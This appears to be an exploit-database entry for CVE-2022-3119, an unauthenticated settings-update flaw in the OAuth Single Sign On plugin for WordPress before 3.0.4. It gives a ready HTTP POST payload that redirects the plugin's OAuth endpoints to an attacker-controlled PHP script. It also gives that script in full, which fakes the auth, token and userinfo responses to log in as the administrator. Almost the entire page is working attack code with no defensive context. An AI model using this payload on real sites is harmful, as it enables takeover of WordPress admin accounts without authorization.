Exploit for OAuth client Single Sign On for WordPress < 3.0.4 - Unauthenticated Settings Update to Authentication Bypass CVE-2022-3119

Name: Exploit for OAuth client Single Sign On for WordPress < 3.0.4 - Unauthenticated Settings Update to Authentication Bypass CVE-2022-3119
Rating: 5 (227 reviews)

2022-09-05 | CVSS 1.0

## https://sploitus.com/exploit?id=WPEX-ID:55B83CEE-A8A5-4F9D-A976-A3EED9A558E5
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=oauthconfig&OAuthConfig_nonce=-&oauthservers=Custom_OAuth&client_id=-&client_secret=-&rquest_in_body=1&client_authorization=http%3A%2F%2Flocalhost%2Foauth-exploit.php%3Fauth%3D1&client_token_endpoint=http%3A%2F%2Flocalhost%2Foauth-exploit.php%3Ftoken%3D1&client_userinfo_endpoint=http%3A%2F%2Flocalhost%2Foauth-exploit.php%3Fresource%3D1

With exploit.php controlled by the attacker with

/** auth endpoint */
if ( isset( $_GET['auth'] ) ) {
	if ( isset( $_GET['response_type'] ) ) {
		if ( 'code' == $_GET['response_type'] ) {
			header( 'Location: ' . $_GET['redirect_uri'] . '/?' . http_build_query( array(
					'code' => '-', //can be anything, just don’t be empty
				) ) );
			exit;
		}
	}
}

/** token endpoint */
if ( isset( $_GET['token'] ) ) {
	if ( isset( $_POST['grant_type'] ) ) {
		echo json_encode( array(
			'access_token' => '-', //can be anything, just don’t be empty
		) );
		exit;
	}
}

/** resource endpoint */
if ( isset( $_GET['resource'] ) ) {
	echo json_encode( array(
		'email'      => 'admin@localhost',
		'user_login' => '-', //can be anything, just don’t be empty
	) );
	exit;
}